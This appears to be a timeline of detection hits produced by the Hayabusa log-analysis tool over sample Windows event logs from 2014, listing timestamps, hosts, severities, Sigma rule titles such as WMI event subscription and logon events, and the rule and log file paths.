5332014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5342014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5352014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5362014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5372014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5382014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5392014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5402014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5412014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5422014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5432014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5442014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5452014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5462014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5472014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5482014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5492014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5502014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5512014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5522014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5532014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5542014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5552014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5562014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5572014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5582014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5592014-11-24 14:11:12.548 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5602014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5612014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5622014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5632014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5642014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5652014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5662014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5672014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5682014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5692014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5702014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5712014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5722014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5732014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5742014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5752014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5762014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5772014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5782014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5792014-11-24 14:11:13.251 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5802014-11-26 02:18:43.547 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5812014-11-26 02:18:43.547 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5822014-11-26 02:18:43.562 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5832014-11-26 02:23:49.093 +09:00IE8Win719highWMI Event Subscriptionrules/sigma/wmi_event/sysmon_wmi_event_subscription.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5842014-11-26 02:25:02.877 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5852014-11-26 02:25:02.877 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5862014-11-26 02:25:02.877 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5872014-11-26 02:48:26.739 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5882014-11-26 02:48:26.739 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5892014-11-26 02:48:26.739 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5902014-11-26 02:57:33.848 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5912014-11-26 02:57:33.848 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5922014-11-26 02:57:33.848 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5932014-11-26 03:01:39.454 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5942014-11-26 03:01:39.454 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5952014-11-26 03:01:39.454 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5962014-11-26 03:02:36.847 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5972014-11-26 03:02:36.847 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
5982014-11-26 03:02:36.847 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
5992014-11-26 03:05:21.128 +09:00IE8Win79mediumRaw Disk Access Using Illegitimate Toolsrules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6002014-11-26 03:05:40.910 +09:00IE8Win74648informationalExplicit LogonSource User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.localrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6012014-11-26 03:08:12.894 +09:00IE8Win79mediumRaw Disk Access Using Illegitimate Toolsrules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6022014-11-26 06:49:55.313 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6032014-11-26 06:49:55.313 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6042014-11-26 06:49:55.313 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6052014-11-26 06:50:49.109 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x2b7f0rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6062014-11-26 06:52:22.343 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6072014-11-26 06:52:22.343 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6082014-11-26 06:52:36.312 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6092014-11-26 06:52:41.000 +09:00IE8WIN74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6102014-11-26 06:52:48.955 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6112014-11-26 06:52:48.955 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6122014-11-26 06:52:48.955 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6132014-11-26 06:54:52.158 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6142014-11-26 06:54:52.158 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf564 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6152014-11-26 06:54:52.158 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0xcf598 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6162014-11-26 06:54:52.158 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0xcf564rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6172014-11-26 06:55:06.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6182014-11-26 06:55:06.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6192014-11-26 06:57:07.814 +09:00IE8Win79mediumRaw Disk Access Using Illegitimate Toolsrules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6202014-11-26 07:23:56.107 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6212014-11-26 07:23:56.107 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6222014-11-26 07:23:56.575 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6232014-11-26 07:26:20.278 +09:00IE8Win74648informationalExplicit LogonSource User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.localrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6242014-11-26 07:35:01.091 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0xcf598rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6252014-11-26 07:38:14.156 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6262014-11-26 07:38:14.156 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6272014-11-26 07:38:20.765 +09:00IE8Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6282014-11-26 07:38:22.000 +09:00IE8Win74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6292014-11-26 07:38:26.183 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6302014-11-26 07:38:26.183 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6312014-11-26 07:38:26.183 +09:00IE8Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6322014-11-26 07:38:48.104 +09:00IE8Win74648informationalExplicit LogonSource User: IE8WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6332014-11-26 07:38:48.104 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27008 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6342014-11-26 07:38:48.104 +09:00IE8Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE8WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x27038 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6352014-11-26 07:38:48.104 +09:00IE8Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x27008rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6362014-11-26 07:40:33.000 +09:00IE8Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6372014-11-26 07:40:33.000 +09:00IE8Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6382014-11-26 07:48:51.643 +09:00IE8Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x27038rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6392014-11-26 07:50:56.046 +09:00IE9Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6402014-11-26 07:50:56.046 +09:00IE9Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6412014-11-26 07:51:16.890 +09:00IE9Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6422014-11-26 07:51:22.000 +09:00IE9WIN74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6432014-11-26 07:51:29.601 +09:00IE9Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6442014-11-26 07:51:29.601 +09:00IE9Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6452014-11-26 07:51:29.601 +09:00IE9Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6462014-11-26 07:51:34.460 +09:00IE9Win74648informationalExplicit LogonSource User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6472014-11-26 07:51:34.460 +09:00IE9Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12048 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6482014-11-26 07:51:34.460 +09:00IE9Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x12070 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6492014-11-26 07:51:34.460 +09:00IE9Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x12048rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6502014-11-26 07:56:09.000 +09:00IE9Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6512014-11-26 07:56:09.000 +09:00IE9Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6522014-11-26 08:03:14.476 +09:00IE9Win74647informationalLogoff - User InitiatedUser: IEUser : LogonID: 0x12070rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6532014-11-27 02:34:44.156 +09:00IE9Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6542014-11-27 02:34:44.156 +09:00IE9Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6552014-11-27 02:34:54.687 +09:00IE9Win74624informationalLogon Type 0 - SystemBootuprules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6562014-11-27 02:34:59.000 +09:00IE9WIN74625mediumFailed Logon From Public IPrules/sigma/builtin/security/win_susp_failed_logon_source.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
6572014-11-27 02:35:04.667 +09:00IE9Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6582014-11-27 02:35:04.667 +09:00IE9Win71highExecution Of Other File Type Than .exerules/sigma/process_creation/process_creation_susp_non_exe_image.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
6592014-11-27 02:35:04.667 +09:00IE9Win74616mediumUnauthorized System Time Modificationrules/sigma/builtin/security/win_susp_time_modification.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6602014-11-27 02:35:09.745 +09:00IE9Win74648informationalExplicit LogonSource User: IE9WIN7$ : Target User: IEUser : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhostrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6612014-11-27 02:35:09.745 +09:00IE9Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x131c3 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6622014-11-27 02:35:09.745 +09:00IE9Win74624informationalLogon Type 2 - InteractiveUser: IEUser : Workstation: IE9WIN7 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x13216 : (Warning: Credentials are stored in memory)rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6632014-11-27 02:35:09.745 +09:00IE9Win74672informationalAdmin LogonUser: IEUser : LogonID: 0x131c3rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6642014-11-27 02:35:57.635 +09:00IE9Win74648informationalExplicit LogonSource User: IEUser : Target User: rdavis : IP Address: - : Process: : Target Server: HYPERV.sharplogic.localrules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
6652014-11-27 02:38:06.000 +09:00IE9Win71highExecution Of Not Existing Filerules/sigma/process_creation/process_creation_susp_image_missing.yml../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
